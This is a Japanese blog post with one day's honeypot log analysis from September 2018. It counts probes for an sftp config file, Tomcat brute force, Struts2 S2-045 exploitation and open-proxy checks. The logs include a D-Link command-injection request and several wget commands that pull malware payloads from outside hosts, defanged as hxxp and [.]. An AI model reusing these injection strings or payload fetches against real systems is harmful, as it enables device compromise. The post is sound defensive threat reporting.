ハニーポットのログ分析(2018/09/19)
WOWhoneypotの2018/09/19(水) (運用106日目)の簡易分析です。
本日の総アクセス件数は 159件です。
本日の主な内容は以下です。
・(新規)sftp設定ファイルの調査:1件
→「GET /sftp-config.json」でのアクセスです。アクセスログにそれ以上の情報はありませんでした。
以下に情報があります。
他のハニーポッターのところにも同じアクセスは来ているようです。
9/20 #ハニーポット観察
— 週末の蜜鉢観察係 (@cactus_pots) September 20, 2018
sublimeのsftp設定ファイルへのアクセスがありました。
/sftp-config.json
普通の運用環境だとこれがドキュメントルートにあるとは想定しずらいですが、くるということはきっとうまみがあるのでしょうか。ホーム直下をうっかり公開しちゃう人とかを狙っているのでしょうか。
・Tomcat管理ページへのブルートフォース攻撃:52件
・Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃:44件
→同一IPから全件来ていました。ペイロードのダウンロード先はハンティングログ記載の3種類がありました。なぜ同じIPから複数種類来ているのかが気になります。
・不正中継の調査:18件
以下が全アクセスログです。
件数 | 日付 | 種別 | リクエスト |
52 | 2018-09-19 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
44 | 2018-09-19 | Apache Struts2の脆弱性S2-045(CVE-2017-5638) | GET /index.action |
39 | 2018-09-19 | アクセス | GET / |
4 | 2018-09-19 | 不正中継の調査 | CONNECT www.baidu[.]com:443 |
3 | 2018-09-19 | 不正中継の調査 | GET hxxp://www.ip[.]cn/ |
3 | 2018-09-19 | 不正中継の調査 | GET hxxp://www.123cha[.]com/ |
3 | 2018-09-19 | 不正中継の調査 | CONNECT cn.bing[.]com:443 |
2 | 2018-09-19 | クローリング | GET /robots.txt |
2 | 2018-09-19 | 不正中継の調査 | CONNECT 133.130.126[.]119:43 |
1 | 2018-09-19 | 調査 | HEAD / |
1 | 2018-09-19 | sftp設定ファイルの調査 | GET /sftp-config.json |
1 | 2018-09-19 | phpMyAdminの調査 | GET /phpmyadmin |
1 | 2018-09-19 | D-Linkを狙うMirai亜種 | GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.172.164[.]41/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ |
1 | 2018-09-19 | 不正中継の調査 | GET hxxp://www.baidu[.]com/ |
1 | 2018-09-19 | 不正中継の調査 | GET hxxp://www.123cha[.]com |
1 | 2018-09-19 | 不正中継の調査 | CONNECT www.baidu[.]com |
本日のドメイン名でのアクセスは以下です。
2 GET /
1 GET /robots.txt
本日のハンティングログは以下です。
件数 | 日付 | リクエスト | 種別 |
11 | 2018-09-19 | wget -c hxxp://wap.tfddos[.]net:57843/linux | Struts2 |
10 | 2018-09-19 | wget -c hxxp://222.186.138[.]8:3333/bbbiu | Struts2 |
1 | 2018-09-19 | wget hxxp://185.172.164[.]41/e | Mirai亜種 |
1 | 2018-09-19 | wget -c hxxp://43.226.146[.]23:2422/qbz95 | Struts2 |
以上です。